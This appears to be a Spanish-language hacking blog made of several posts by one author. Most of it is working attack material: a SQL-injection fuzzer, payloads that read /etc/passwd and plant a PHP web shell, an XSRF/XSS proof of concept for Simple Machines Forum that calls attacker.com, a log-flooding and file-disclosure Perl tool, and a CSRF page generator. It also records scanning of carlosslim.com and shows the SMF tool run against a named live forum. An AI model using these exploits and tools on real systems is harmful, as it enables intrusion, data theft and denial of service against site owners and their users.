Posted on
18:27
by Xianur0
<?php
function detectar($ascii) {
for ($i = 0; $i < strlen($ascii); $i++) {
$byte = ord($ascii{$i});
if($byte >=48 && $byte <=57 || $byte >=64 && $byte <=90 || $byte >=97 && $byte <=122 || $byte == 46) {
$hex .= chr($byte);
} else { print "Injeccion de Caracteres Detectado!\n"; exit; }
}
return $hex;
}
foreach($_GET as $var => $value) {
$value = detectar($value);
$_GET[$var] = $value;
}
foreach($_POST as $var => $value) {
$value = detectar($value);
$_GET[$var] = $value;
}
?>
solo pasan letras, arroba, números (ni espacios pasan xD).
Posted on
14:59
by Xianur0
Esta lista la iré llenando, pero por ahora pondré un vídeo (con sus respectivas herramientas que use de ejemplo).
Bypass
nota: Actualizado el vídeo, el anterior no se veía.
Posted on
10:27
by Xianur0
Felicidades a Ramón Redondo de Geek In Love
(clic en la imagen para ver completa)
Liquidez: En economía la
liquidez representa la cualidad de los activos para ser convertidos en dinero efectivo de forma inmediata sin pérdida significativa de su valor.
Activos: Bienes con valor comercial que una compañía posee y que aparecen en su balance general, con inclusión de dinero en efectivo, equipo, inventario, etc.
Posted on
19:05
by Xianur0
No es tanto como rootear pero si se puede subir shell jeje..
Xianur0 ~ # perl fuzzer.pl http://localhost/vuln.php?id=
Imprime Columna: 0
Imprime Columna: 1
Imprime Columna: 2
URI Generado:
http://localhost/vuln.php?id=-10/**/UNION/**/SELECT/**/concat(0x46757a7a657242795869616e757230,0),concat(0x46757a7a657242795869616e757230,1),concat(0x46757a7a657242795869616e757230,2)
(utilizamos el mismo script que en el ultimo manual de SQL Injection que publique)
Fuzzer.pl:
#!/usr/bin/perl
#By Xianur0
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
my $uri = $ARGV[0];
$uri = shift || die("Uso: fuzzer.pl [URI a SQL Injection]\n");
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16");
my $inyeccion = "-10/**/UNION/**/SELECT/**/concat(0x46757a7a657242795869616e757230,0)";
$uri .= "$inyeccion";
for($i=1; $i<1000;$i++) {
$uri .= ",concat(0x46757a7a657242795869616e757230,$i)";
$req = HTTP::Request->new(GET => $uri);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if($res->content !~ "The used SELECT statements have a different number of columns") {
for($o=0; $o<=$i;$o++) {
if($res->content =~ "FuzzerByXianur0$o") {
print "Imprime Columna: $o\n";
}
} die "URI Generado: \n$uri\n";}}
ya que tenemos las tablas a donde imprime vamos a comenzar a recolectar informacion:
http://localhost/vuln.php?id=-10/**/UNION/**/SELECT/**/load_file(0x2f6574632f706173737764),1,2
nota: 0x2f6574632f706173737764 es el equivalente a /etc/passwd en hexadecimal
Si tenemos permisos de leer el archivo nos lo cargara.
Suponiendo que tenemos el directorio donde se encuentra la web tambien podemos leer archivos con datos interesantes, por ejemplo en este ejemplo podemos sacar la password del MySQL, la cual se encuentra en este archivo que estamos usando para el ejemplo, y sabiendo que la ruta es: /opt/lampp/htdocs/vuln.php
ahora podemos conectarnos al servidor MySQL.
<html>
<body>
<?php
function conectado()
{
print '<h1>Conectado!</h1><form action="" method="POST">
<textarea rows="10" cols="40" name="comando"></textarea><br>
<input type="submit" value="xEcut!">
</form>';
}
function inicio() {
print '<form action="" method="GET">
<b>Server: <input type="text" name=server><br>
User: <input type="text" name=user><br>
Password: <input type="text" name=passwd><br>
DB: <input type="text" name=db><br>
<input type="submit" value="Conectar">
</form>';
}
$link = mysql_connect($_GET['server'], $_GET['user'], $_GET['passwd']);
$conectado = mysql_select_db($_GET['db'], $link);
if($conectado) conectado();
if(isset($_POST['comando'])) {
$result = mysql_query($_POST['comando'], $link);
while ($row = mysql_fetch_row($result)){
echo '<textarea rows="10" cols="40">';
foreach($row as $indice => $valor) print $valor."\n";
print '</textarea><br>';
}
} else inicio();
?>
</body>
</html>
Tambien podemos crear archivos en el servidor, como por ejemplo:
http://127.0.0.1/vuln.php?id=-10/**/UNION/**/SELECT/**/0,1,0x3c3f7068700d0a696e636c75646528277368656c6c27293b0d0a3f3e/**/INTO/**/OUTFILE/**/'/opt/lampp/htdocs/shell.php'
Usemos La Shell:
http://127.0.0.1/shell.php?shell=/etc/passwd
Resultado:
root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/log:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games:/bin/false ftp:x:14:50::/home/ftp:/bin/false smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/:/bin/false gdm:x:42:42:GDM:/var/state/gdm:/bin/bash apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false pop:x:90:90:POP:/:/bin/false nobody:x:99:99:nobody:/:/bin/false
También podemos poner en vez de /etc/passwd la url a una shell php.
suponiendo que no tenemos acceso a editar esa carpeta, bueno podemos crear el php en el directorio tmp, y llamar la shell mediante un LFI (por dar un ejemplo).
tambien se puede sacar las DBs enteras mediante load_file(), ya que los archivos de la DB se localizan en: /var/mysql/
Los archivos mas interesantes son los: .MYD jeje, solo recuerden que no están del todo ordenados (están llenos de caracteres ilegibles humanamente hablando).
Pero para ello programe un codigo para eliminar dichos caracteres:
<?php
print "<title>Purificador de Caracteres By Xianur0</title><h1>Purificador de Caracteres By Xianur0</h1><form method='POST'><textarea rows='10' cols='30' name='code'></textarea><br><input type='submit' value='Limpiar!'></form>";
function ascii2hex($ascii) {
for ($i = 0; $i < strlen($ascii); $i++) {
$byte = ord($ascii{$i});
if($byte >=21 && $byte <=126) {
$hex .= chr($byte);
}}
return $hex;
}
if(isset($_POST['code'])) print "<br><b>Texto Limpiado: <br></b>".htmlentities(ascii2hex($_POST['code']));
?>
Nota: Vengador de las Sombras te voy a mandar a estudiar geometría xD.
http://es.wikipedia.org/wiki/Pentagrama_(geometr%C3%ADa)
Posted on
15:48
by Xianur0
lo posteo tal cual lo envie a milw0rm :)..
0days jejje
Author: Xianur0
Affected Versions: All
Vendors: Simple Machine Forums
Vendors Webpage: http://www.simplemachines.org/
XSRF PoC (http://attacker.com/packages.xml):
<?xml version="1.0"?>
<!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
<!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
XSRF PoC By Xianur0
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->
<package-list xmlns="http://www.simplemachines.org/xml/package-list" xmlns:smf="http://www.simplemachines.org/">
<list-title>Xianur0 Was Here</list-title>
<section>
<title>SMF XSS PoC By Xianur0</title>
<text><![CDATA[<script>alert('XSS')</script>]]></text>
<modification>
<id>Xianur0:XSMF</id>
<name>SMF PoC By Xianur0</name>
<filename>smfexploit.zip</filename>
<version>0.1</version>
<author email="uxmal666@gmail.com">Xianur0</author>
<description><![CDATA[<script>alert(document.cookie)</script>]]></description>
</modification>
</section>
</package-list>
XSRF:
Código:
<iframe src ="http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com" width="0%" scrolling=no width=0%></iframe>
Others Details:
The Log Errors basically keeps any minimum error caused by users, good and if it saturated?
http://www.web.com/foro/index.php?action=help;page[]=loginout
(Full path disclosure)
This created a record of error in the log:
2: Illegal offset type in isset or empty
File: /var/www/xxxxxxxxxxxxxx.com/htdocs/Sources/Help.php
Line: 65
?action=help;page[]=loginout
This error is in Sources/Help.php on line 65:
if (!isset($_GET['page']) || !isset($context['all_pages'][$
_GET['page']]))
$_GET['page'] = 'index';
Correction:
Código:
if (!is_array($_GET['page']) && !isset($_GET['page']) || !is_array($_GET['page']) && !isset($context['all_pages'][$_GET['page']]))
$_GET['page'] = 'index';
Errors handling packages:
Error handling packages for temporary, the SMF to upload a mod and run it makes a backup of each PHP file that is touched, but at the end of the amendment, not erased, then this can be accessed by any other user:
http://www.victima.com/index.php~
http://www.victima.com/Settings.php~
Error leaves Files:
Some of the SMF files are not protected as they should, for example:
http://www.victima.com/Packages/installed.list
This can be used for scan packet (many packets that are sent to SMF have security flaws such as XSS, SQL Inyection and in some cases RFI)
Getting Directory installation of SMF (useful for attacking free hostings)
http://www.victima.com/SSI.php?ssi_layers
Result:
Notice: Undefined variable: ssi_layers in/home/web/public_html/forum/SSI.php on line 99
Hacking attempt ...
It also serves to create heavy logs as these mistakes are stored directly on:
http://www.victima.com/error_log
Tool:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Std;
my $url = $ARGV[1] || die ("Use: smf.pl [Full URL] [option]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l Installed Mods List \n-b Find Temporary\n");
$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
getopts('fplb', \%opt);
flood() if $opt{f};
path() if $opt{p};
list() if $opt{l};
temp() if $opt{b};
sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}
sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split('Undefined variable: ssi_layers in <b>', $html);
my @htmls = split('SSI.php</b>', $htmls[1]);
if($htmls[0] ne "") { print "Directory: $htmls[0]\n"; } else { print "Getting error Directory!\n";}
}
}
sub flood {
print "Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET => $url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "Sent: ".$i."\n";
} else {
print "HTTP Error Query: " . $res->status_line . "\n";
}
}
}
sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "Temporary File Found: ".$url."/".$temp."\n";
}
}
}
sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "Description: $mod[0]\nFile: $url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";
}
}
}
Posted on
18:01
by Xianur0
Puertos abiertos:
PORT STATE SERVICE
23/tcp open telnet
25/tcp filtered smtp
53/tcp open domain
80/tcp open http
514/tcp open shell
554/tcp open rtsp
646/tcp filtered unknown
1755/tcp open wms
3128/tcp open squid-http
HTTP Proxy Transparent: www.carlosslim.com:3128
Telnet: www.carlosslim.com:23
Bash History: http://ns6.carlosslim.com/.bash_history
Analizando los DNS:
Xianur0 ~ # dig @ns6.carlosslim.com carlosslim.com ANY ; <<>> DiG 9.4.1 <<>> @ns6.carlosslim.com carlosslim.com ANY ; (1 server found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36506 ;; flags: qr aa rd; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 3 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;carlosslim.com. IN ANY ;; ANSWER SECTION: carlosslim.com. 86400 IN A 200.65.129.1 carlosslim.com. 86400 IN A 200.65.0.26 carlosslim.com. 86400 IN SOA ns6.carlosslim.com. dominios.telmex.com. 84 28800 7200 604800 600 carlosslim.com. 86400 IN MX 10 smtp.carlosslim.com. carlosslim.com. 86400 IN NS ns6.carlosslim.com. carlosslim.com. 86400 IN NS ns7.carlosslim.com. ;; ADDITIONAL SECTION: smtp.carlosslim.com. 86400 IN A 200.57.144.18 ns6.carlosslim.com. 86400 IN A 200.57.141.232 ns7.carlosslim.com. 86400 IN A 200.57.141.233 ;; Query time: 73 msec ;; SERVER: 200.57.141.232#53(200.57.141.232) ;; WHEN: Wed Nov 5 16:51:14 2008 ;; MSG SIZE rcvd: 221
Xianur0 ~ # nc -vv ns6.carlosslim.com 80
DNS fwd/rev mismatch: ns6.carlosslim.com != cust-200-57-141-232.triara.com
ns6.carlosslim.com [200.57.141.232] 80 (http) open
OPTIONS / HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Wed, 05 Nov 2008 23:59:31 GMT
Content-length: 0
Content-type: magnus-internal/directory
Allow: HEAD, GET
sent 36, rcvd 167
Xianur0 ~ # nc -vv ns7.carlosslim.com 80
DNS fwd/rev mismatch: ns7.carlosslim.com != cust-200-57-141-233.triara.com
ns7.carlosslim.com [200.57.141.233] 80 (http) open
TRACE / HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Thu, 06 Nov 2008 00:04:44 GMT
Content-length: 37
Content-type: message/http
TRACE / HTTP/1.1
Host: localhost
sent 34, rcvd 174
Xianur0 ~ # dig @ns6.carlosslim.com localhost SOA
; <<>> DiG 9.4.1 <<>> @ns6.carlosslim.com localhost SOA
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 16496 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;localhost. IN SOA ;; ANSWER SECTION: localhost. 86400 IN SOA tmpyap01.telmex.com. dominios.telmex.com. 1 28800 7200 604800 3600 ;; AUTHORITY SECTION: localhost. 86400 IN NS ns6.telmex.com. ;; ADDITIONAL SECTION: ns6.telmex.com. 600 IN A 200.57.141.232 ;; Query time: 685 msec ;; SERVER: 200.57.141.232#53(200.57.141.232) ;; WHEN: Wed Nov 5 17:12:21 2008 ;; MSG SIZE rcvd: 125
Posted on
8:39
by Xianur0
Hola gente, ya se que es un juego muy friki xD... pero me envicie con el jaja
Servidor: 15
Clan: H.C.
Nombre del Clan: Hijos de Cain
algún interesado?, la entrada es publica xD...
Posted on
8:02
by Xianur0
Victim: http://www.tinyportalmedia.com
Method: Unsafe handling packages
Used Tool: Tool For SMF Testing By Xianur0
Xianur0 cys # perl smf.pl
Use: smf.pl [option] [Full URL]
Options:
-f Flood
-p Search Directory Setup
-l Installed Mods List
-b Find Temporary
Xianur0 cys # perl smf.pl -p http://www.tinyportalmedia.com/main/
Directory: /home/strzxpz/public_html/main/
Xianur0 cys # perl smf.pl -b http://www.tinyportalmedia.com/main/
Temporary File Found: http://www.tinyportalmedia.com/main//index.php~
Temporary File Found: http://www.tinyportalmedia.com/main//Settings.php~
Temporary File Found: http://www.tinyportalmedia.com/main//Settings_bak.php~
Settings.php~ and Settings_bak.php~ are few false positives, but index.php~ is correct :) ..
Xianur0 cys # perl smf.pl -l http://www.tinyportalmedia.com/main/
Description: TinyPortal
File: http://www.tinyportalmedia.com/main//Packages/TP_0971.zip
Name: bloc:tinyportal
Version: 1.052
Description: SMF Staff Page
File: http://www.tinyportalmedia.com/main//Packages/staff.zip
Name: vbgamer45:SMFStaff
Version: 1.5.1
Description: Avatar on Member List
File: http://www.tinyportalmedia.com/main//Packages/avmemlist.zip
Name: alm:avonmemberlist
Version: 1.0
Description: Country Flags
File: http://www.tinyportalmedia.com/main//Packages/CountryFlag_1-0-2.tar.gz
Name: jaybachatero:country_flags
Version: 1.0.1
Description: Global Announcements
File: http://www.tinyportalmedia.com/main//Packages/GlobalAnnouncements_1-0_Final.tar.gz
Name: jaybachatero:ga
Version: 1.0
Description: Googlebot & Spiders Mod
File: http://www.tinyportalmedia.com/main//Packages/Googlebot_v2_0_3_only_smf1.1.x.zip
Name: obazavil:googlebot
Version: 2.0.3
Description: K-Detection
File: http://www.tinyportalmedia.com/main//Packages/K_Detection_v2.2.zip
Name: Nikola:K-Detection
Version: 2.2
Description: Karma Blocks Package V.04
File: http://www.tinyportalmedia.com/main//Packages/Karma_Blocks_Package_v0.4.zip
Name: Max:Karmablocks
Version: 0.4
Description: Bear Tabs
File: http://www.tinyportalmedia.com/main//Packages/bear_tabs1.zip
Name: Akulion:BearTabsMod
Version: 1.0
Description: Admin Notepad
File: http://www.tinyportalmedia.com/main//Packages/notepad.zip
Name: vbgamer45:AdminNotepad
Version: 1.0
Description: Member Notepad
File: http://www.tinyportalmedia.com/main//Packages/PersonalPad.zip
Name: vbgamer45:MemberNotepad
Version: 1.0
Description: Profile Comments
File: http://www.tinyportalmedia.com/main//Packages/ProfileComments.zip
Name: vbgamer45:ProfileComments
Version: 1.2.1
Description: Topic Ratings
File: http://www.tinyportalmedia.com/main//Packages/ratings.tar.gz
Name: grudge:ratings
Version: 1.03
Description: Topic Solved
File: http://www.tinyportalmedia.com/main//Packages/tsolved_v1.22.tar.gz
Name: grudge:topic_solved
Version: 1.22
Description: VisualWarning
File: http://www.tinyportalmedia.com/main//Packages/visualwarning132.zip
Name: Grudge:VisualWarning
Version: 1.32
Description: Zodiac_13Moon
File: http://www.tinyportalmedia.com/main//Packages/zodiac_13moon.zip
Name: koji:Zodiac_13Moon
Version: 2.0
Description: Inline Attachments
File: http://www.tinyportalmedia.com/main//Packages/InlineAttachmentMod_FromDonationCoderDotCom.zip
Name: mouser_at_donationcoder.com:inlineattachments
Version: 1.0.4.2
Description: SMFShop
File: http://www.tinyportalmedia.com/main//Packages/SMFShop_3-0_Fresh_Install.zip
Name: daniel15:SMFShop
Version: 3.0
Description: Personal Message Auto Responder
File: http://www.tinyportalmedia.com/main//Packages/pmAutoRespond_V0-2.zip
Name: MikeMill:pmAutoResponder
Version: 0.2
Description: Location Mod - Additional Maps
File: http://www.tinyportalmedia.com/main//Packages/gobalopper.locationmod.additionalmaps.zip
Name: gobalopper:locationmod.additional_maps
Version: 1.2
Description: SMF Gallery Pro
File: http://www.tinyportalmedia.com/main//Packages/smf_gallery_pro.zip
Name: vbgamer45:smfgallerypro
Version: 1.2.2
Description: SMF Gallery Pro Profile Link
File: http://www.tinyportalmedia.com/main//Packages/profilelink.zip
Name: vbgamer45:proprofilelink
Version: 1.0
Description: Welcome Topic Mod
File: http://www.tinyportalmedia.com/main//Packages/93WelcomeTopic.zip
Name: vbgamer45:WelcomeTopic
Version: 1.0
Description: SMF Links
File: http://www.tinyportalmedia.com/main//Packages/26links.zip
Name: vbgamer45:SMFLinks
Version: 1.6.3
Description: SMF Gallery Pro Recent Profile Images
File: http://www.tinyportalmedia.com/main//Packages/profileimages.zip
Name:
Version: 1.0
Description: SMF Gallery Pro Recent Comments Board Index
File: http://www.tinyportalmedia.com/main//Packages/recentcomments.zip
Name: vbgamer45:recentcommentsboardindex
Version: 1.0
Description: SMF Gallery Pro SSI
File: http://www.tinyportalmedia.com/main//Packages/smfgalleryssi.zip
Name: vbgamer45:smfgalleryprossi
Version: 1.1
Description: Enhanced Calendar
File: http://www.tinyportalmedia.com/main//Packages/Calendar_1-1.zip
Name: daniel15:Calendar
Version: 1.1
Description: MySpace Field
File: http://www.tinyportalmedia.com/main//Packages/myspace.zip
Name: snork13:MySpace
Version: 2.4
Description: DeviantART Field
File: http://www.tinyportalmedia.com/main//Packages/deviantART.zip
Name: stormlrd:DeviantART
Version: 1.0
Description: Profile User Action
File: http://www.tinyportalmedia.com/main//Packages/ProfileUserAction_v1.1.zip
Name: Rudolf:profileuseraction
Version: 1.1
Description: Add Custom Modifications to Aero
File: http://www.tinyportalmedia.com/main//Packages/aero.zip
Name: stormlrd:addmodstothemes
Version: 1.0
Description: Signature Dropdown Choices
File: http://www.tinyportalmedia.com/main//Packages/SignatureDropDownsV10.zip
Name: Kays:SignatureDropDowns
Version: 1.0
Description: Merge Double Posts
File: http://www.tinyportalmedia.com/main//Packages/DoublePostMerge107.zip
Name: din1031:DoublePostMerge
Version: 1.0.7
Description: Related Topics
File: http://www.tinyportalmedia.com/main//Packages/related_topics_1.1.1.zip
Name: Niko:RelatedTopic
Version: 1.1.1
Description: SMF Sitemap
File: http://www.tinyportalmedia.com/main//Packages/smf_sitemap_1.1.3.zip
Name: airridetalk:smf_sitemap
Version: 1.1.3
Description: Sci-Fi Avatars
File: http://www.tinyportalmedia.com/main//Packages/SciFi.zip
Name: Brandon:SciFi
Version: 1.0
Description: Google Member Map
File: http://www.tinyportalmedia.com/main//Packages/GoogleMap.template.zip
Name: TLM:GoogleMapsMod
Version: 0.55
Description: SMF 1.0.11 / 1.1.3 Update
File: http://www.tinyportalmedia.com/main//Packages/smf_patch_1.1.3_1.0.11.tar.gz
Name: smf:smf-1.0.11-1.1.3
Version: 1.1
Description: SMF Gallery Pro Upgrade
File: http://www.tinyportalmedia.com/main//Packages/SMFGalleryUpgrade1.2.2.zip
Name: vbgamer45:smfgalleryproupgrade122
Version: 1.3.21
Description: FelBlog for SMF
File: http://www.tinyportalmedia.com/main//Packages/felblog_940_smf.zip
Name: feline:FelBlog_SMF
Version: 0.941
Description: SMF Trader System
File: http://www.tinyportalmedia.com/main//Packages/12Trader.zip
Name: vbgamer45:SMFTraderSystem
Version: 1.1
Description: SMF 1.0.12 / 1.1.4 / 2.0 b1.1 Update
File: http://www.tinyportalmedia.com/main//Packages/smf_patch_1.0.12_1.1.4_2.0.b1.1.tar.gz
Name: smf:smf-1.0.12-1.1.4-2.0.b1.1
Version: 1.0
Description: User Email System
File: http://www.tinyportalmedia.com/main//Packages/useremail.zip
Name: vbgamer45:UserEmailSystem
Version: 1.2
Description: Contact Page
File: http://www.tinyportalmedia.com/main//Packages/contact.zip
Name: vbgamer45:ContactPage
Version: 1.1
Description: Bookmarks
File: http://www.tinyportalmedia.com/main//Packages/bookmarks101.zip
Name: aaronvg:bookmarks
Version: 1.0.1
Description: SMF Classifieds Recent Classifieds Board Index
File: http://www.tinyportalmedia.com/main//Packages/classboardindex.zip
Name: vbgamer45:recentclassboardindex
Version: 1.0
Description: SMF Classifieds
File: http://www.tinyportalmedia.com/main//Packages/SMF_Classifieds_1.0.10.zip
Name: vbgamer45:smfclassifieds
Version: 1.0.10
Description: MessagePreviewOnHover
File: http://www.tinyportalmedia.com/main//Packages/MessagePreviewOnHover.zip
Name: snork13:MessagePreviewOnHover
Version: 1.5
Description: Gallery 2 Integration
File: http://www.tinyportalmedia.com/main//Packages/smf_g2-Beta3.1.tar.gz
Name: Oldiesmann:Gallery2
Version: 1.0beta3.1
Description: SMF Store
File: http://www.tinyportalmedia.com/main//Packages/SMFStore1.2beta.zip
Name: vbgamer45:smfstore
Version: 1.2beta
Description: Add Domaintools to TrackIP
File: http://www.tinyportalmedia.com/main//Packages/domaintools.zip
Name: Marook:TrackIP_Add_Domaintools
Version: 1.0
Description: SMF Gallery Pro Light Box Addon
File: http://www.tinyportalmedia.com/main//Packages/lightbox.zip
Name: vbgamer45:lightbox
Version: 1.1
Description: E-Arcade
File: http://www.tinyportalmedia.com/main//Packages/E-Arcade2.5.0.zip
Name: Eric:Arcade
Version: 2.5.0
Description: SMFChess
File: http://www.tinyportalmedia.com/main//Packages/SMFChess_1.0.zip
Name: Feeble:SMFChess
Version: 1.0
Description: Member Color Link
File: http://www.tinyportalmedia.com/main//Packages/MemberColorLink216.zip
Name: din1031:MemberColorLink
Version: 2.1.6
Description: MCLegendII.2
File: http://www.tinyportalmedia.com/main//Packages/MCLegendII.2.zip
Name: JB:MCLII
Version: 2.0
Description: SMF 1.0.13 / 1.1.5 / 2.0 b3.1 Update
File: http://www.tinyportalmedia.com/main//Packages/smf_patch_1.0.13_1.1.5_2.0-b3.1.tar.gz
Name: smf:smf-1.0.13-1.1.5-2.0.b3.1
Version: 1.0
Description: SMF Store Upgrade
File: http://www.tinyportalmedia.com/main//Packages/SMFStore1.2.1upgrade.zip
Name: vbgamer45:smfstoreupgrade
Version: 1.2.4
Description: SMF 1.0.14 / 1.1.6 Update
File: http://www.tinyportalmedia.com/main//Packages/smf_patch_1.0.14-1.1.6_1.zip
Name: smf:smf-1.0.14-1.1.6
Version: 1.0
Now is reviewing the package ... I see at least one with SQL Injection: P. ..
Saludos! :P...
Xianur0 Was Here xD...
Posted on
7:32
by Xianur0
#!/usr/bin/perl
# By Xianur0
use LWP::UserAgent;
use Getopt::Std;
my $url = $ARGV[1] || die ("Use: smf.pl [Full URL] [option]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l Installed Mods List \n-b Find Temporary\n");
$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
getopts('fplb', \%opt);
flood() if $opt{f};
path() if $opt{p};
list() if $opt{l};
temp() if $opt{b};
sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,
en;q=0.3');
}
sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split('Undefined variable: ssi_layers in <b>', $html);
my @htmls = split('SSI.php</b>', $htmls[1]);
if($htmls[0] ne "") { print "Directory: $htmls[0]\n"; } else { print "Getting error Directory!\n";}
}
}
sub flood {
print "Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET => $url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "Sent: ".$i."\n";
} else {
print "HTTP Error Query: " . $res->status_line . "\n";
}
}
}
sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "Temporary File Found: ".$url."/".$temp."\n";
}
}
}
sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "Description: $mod[0]\nFile: $url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";
}
}
}
Posted on
17:08
by Xianur0
mmm el hijo prodigio?
#!/usr/bin/perl
#By Xianur0
#uxmal666[at]gmail.com
use HTML::Parser;
$i = 1;
$b = 1;
my $parser = HTML::Parser->new(api_version=>3,
start_h=>[\&parsear, 'tag, attr'] ,);
print "\n\n Generador XSRF By Xianur0\n\n\n";
$file = $ARGV[0] || die("Use: xsrf.pl [File]\n");
open(FILE,$file) || die "No pudo abrirse: $!";
while(<FILE>) {
$html.= $_;
}
print "\nBuscando Campos....\n";
sub parsear {
my ($tag, $attr) = @_;
if($tag =~ "form") {
$name = $attr->{"name"};
if($name eq "") { $name = "campo" }
$valor = $attr->{"action"};
$metodo = $attr->{"method"};
if($metodo eq "") { $metodo = "GET"}
print "\nFormulario ".$b.": ".$name."=>".$valor."=>".$metodo."\n";
$form{$b} = [$name, $metodo];
$b++;
}
if($tag =~ "input") {
$name = $attr->{"name"};
$valor = $attr->{"value"};
print "Campo ".$i.": ".$name."=>".$valor."\n";
$input{$i} = [$name, $valor];
$i++;
}
}
$parser->parse($html);
print "\nTerminado Archivo Parseado!..\n\n";
print "\nEscribe el Formulario a utilizar:\n";
$forma=<STDIN>;
chop($forma);
print "Cuantos Campos(input) utilizara?\n";
$cantidad=<STDIN>;
chop($cantidad);
for($o=1;$o<=$cantidad;$o++)
{
print "Formulario $o?\n";
$inputa=<STDIN>;
chop($inputa);
print "Desea Cambiar el Value? [y/n]\n";
$respuesta=<STDIN>;
chop($respuesta);
if($respuesta eq "y") {
print "Escriba el Nuevo Valor:\n";
$valu=<STDIN>;
chop($valu);
} else { $valu = $input{$inputa}[1]; }
$campos .='<input type="hidden" name="'.$input{$inputa}[0].'" value="'.$valu.'">';
}
print "Url Submit?\n";
$url=<STDIN>;
chop($url);
print "Generando XSRF Espere Por Favor...\n";
$xsrf = '<html><body><!-- XSRF Generator By Xianur0 -->
<form name="'.$form{$forma}[0].'" action="'.$url.'" method="'.$form{$forma}[1].'">'.$campos.'</form>
<script>document.'.$form{$forma}[0].'.submit()</script></html></body>';
open(LECTURA,">> xsrf.htm") || die "No pudo abrirse: $!";
print LECTURA $xsrf;
close(LECTURA);
print "\n\nGenerado!: xsrf.html\n\n";
Posted on
17:02
by Xianur0
English: This tool converts Bug Blind SQL Injection in a SQL Injection ordinary and gives you data output that is not limited only to Boolean jaja
Esta tool simplemente convierte los bugs Blind SQL Injection en SQL Injection comunes y te da salida de datos que no solo se limitan a booleanos jejejejeje.
Una Obra Maestra :P
A Masterpiece :P
#!/usr/bin/perl
#Xianur0 CYS # perl injector.pl http://www.vuln.com/vuln.php?id=1
#
#Blind SQL Injection converter to SQL Injection
#
#Please Have Patience, running.........
#pma@localhost
#
#
#Finished!
#
# By Xianur0
use LWP::UserAgent;
$debugmode = "false";
$ua = LWP::UserAgent->new;
